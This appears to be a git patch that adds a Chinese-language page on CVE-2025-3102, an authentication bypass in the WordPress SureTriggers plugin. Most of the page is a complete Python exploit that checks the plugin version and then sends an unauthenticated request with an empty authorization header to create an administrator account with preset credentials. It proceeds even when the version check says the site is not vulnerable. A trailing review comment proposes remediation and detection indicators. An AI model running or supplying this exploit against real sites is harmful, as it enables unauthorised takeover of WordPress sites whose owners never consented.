From 534388baa8823c28a01ea5301d81391661b75aa0 Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 21 Apr 2025 10:50:11 +0800
Subject: [PATCH] =?UTF-8?q?Create=20WordPress=20SureTriggers=20Plugin?= =?UTF-8?q?=E5=AD=98=E5=9C=A8=E8=BA=AB=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95?= =?UTF-8?q?=E8=BF=87=E6=BC=8F=E6=B4=9E(CVE-2025-3102).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ugin存在身份验证绕过漏洞(CVE-2025-3102).md | 140 ++++++++++++++++++
1 file changed, 140 insertions(+)
create mode 100644 wpoc/WordPress/WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md
diff --git a/wpoc/WordPress/WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md b/wpoc/WordPress/WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md
new file mode 100644
index 0000000..67103ff
--- /dev/null
+++ b/wpoc/WordPress/WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102).md
@@ -0,0 +1,140 @@
+## WordPress SureTriggers Plugin存在身份验证绕过漏洞(CVE-2025-3102)
+
+WordPress 的一体化自动化平台插件存在身份验证绕过漏洞,导致创建管理员帐户。该漏洞是由于在 1.0.78 及之前的所有版本中,“autheticate_user”函​​数中“secret_key”值的空值检查缺失所致。
+这使得未经身份验证的攻击者能够在安装并激活该插件但未配置 API 密钥的情况下,在目标网站上创建管理员帐户。
+
+
+## 漏洞利用python脚本
+```python
+import argparse
+import requests
+import json
+import time
+import re
+
+
+requests.packages.urllib3.disable_warnings()
+
+
+def display_banner():
+ banner = """
+ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@ @@@@@@@@ @@@@@@
+@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@ @@@@@@@@@@ @@@@@@@@
+!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@!! @@! @@@@ @@@
+!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! !@! @!@!@ @!@
+!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ @!@ @!@ @! !@! !!@
+!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! !@! !@!!! !!! !!:
+:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!: !!:! !!! !:!
+:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!:
+ ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: ::: ::::::: :: :: :::::
+ :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : :: : : : : :: : :::
+ Exploit By: Nxploited ( Khaled Alenazi )
+"""
+ print(banner)
+
+
+def fetch_plugin_version(target_url):
+ try:
+ readme_url = f"{target_url.rstrip('/')}/wp-content/plugins/suretriggers/readme.txt"
+ response = requests.get(readme_url, timeout=10, verify=False)
+ if response.status_code == 200:
+ match = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", response.text)
+ if match:
+ return match.group(1)
+ return None
+ except requests.RequestException as e:
+ print(f"[!] Error fetching plugin version: {e}")
+ return None
+
+
+def is_version_vulnerable(version):
+ try:
+ version_parts = list(map(int, version.split(".")))
+ return version_parts <= [1, 0, 78]
+ except ValueError:
+ print("[!] Error parsing version.")
+ return False
+
+
+def prepare_headers():
+ return {
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
+ "Content-Type": "application/json",
+ "st_authorization": ""
+ }
+
+
+def build_payload(email, username, password):
+ return {
+ "integration": "WordPress",
+ "type_event": "create_user_if_not_exists",
+ "selected_options": {
+ "user_email": email,
+ "user_name": username,
+ "password": password
+ },
+ "fields": [],
+ "context": {}
+ }
+
+
+def send_exploit_request(endpoint, headers, payload):
+ try:
+ response = requests.post(endpoint, headers=headers, json=payload, timeout=15, verify=False)
+ return response
+ except requests.RequestException as e:
+ print(f"[-] Exploit request failed: {e}")
+ return None
+
+
+def handle_response(response, username, password):
+ if not response:
+ print("[-] No response received.")
+ return
+ try:
+ response_data = response.json()
+ if response_data.get("success"):
+ print("[+] Exploit successful!")
+ print(f"[+] Credentials: {username}:{password}")
+ else:
+ print("[-] Exploit failed. Response indicated failure.")
+ except json.JSONDecodeError:
+ print("[-] Failed to parse JSON response.")
+
+
+def run_exploit(target_url, email, username, password):
+ print("[*] Fetching plugin version...")
+ version = fetch_plugin_version(target_url)
+ if version:
+ print(f"[+] Plugin version: {version}")
+ if is_version_vulnerable(version):
+ print("[+] Vulnerable version detected. Proceeding with exploit...")
+ else:
+ print("[-] Target version is not vulnerable. Attempting exploit anyway...")
+ else:
+ print("[-] Could not determine plugin version. Proceeding without version verification.")
+
+ headers = prepare_headers()
+ payload = build_payload(email, username, password)
+ endpoint = f"{target_url.rstrip('/')}/wp-json/sure-triggers/v1/automation/action"
+ response = send_exploit_request(endpoint, headers, payload)
+ handle_response(response, username, password)
+
+
+def main():
+ display_banner()
+ parser = argparse.ArgumentParser(description="SureTriggers <= 1.0.78 - Authorization Bypass # By: Nxploited | Khaled Alenazi")
+ parser.add_argument("-u", "--url", required=True, help="Target WordPress base URL")
+ parser.add_argument("-nmail", "--newmail", default="NxploitBot@gmail.com", help="Email to register")
+ parser.add_argument("-nu", "--newuser", default="Nxploited", help="Username to register")
+ parser.add_argument("-np", "--newpassword", default="nxploit123", help="Password for the new user")
+ args = parser.parse_args()
+
+ run_exploit(args.url, args.newmail, args.newuser, args.newpassword)
+
+
+if __name__ == "__main__":
+ main()
+```
+
+<原文>
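Review bot: The new page stops at the closing code fence and gives a site owner nothing to act on; a remediation and detection section is missing after the script. The description already states the two conditions that matter (versions 1.0.78 and earlier, plugin active with no API key configured), so the page should tell readers to upgrade past 1.0.78 (the fixed release is not named here, so `<FIXED_VERSION>` must be filled in from the vendor advisory) and, until then, to configure the key or deactivate the plugin. For detection, the request shape in the script is itself a usable signature: a POST to `/wp-json/sure-triggers/v1/automation/action` with an empty `st_authorization` header, followed by an unexpected administrator account. The script's defaults, username `Nxploited` and email `NxploitBot@gmail.com`, are worth listing as indicators to search for in the user table and access logs. A short heading such as `## 修复与检测` with those points would be enough.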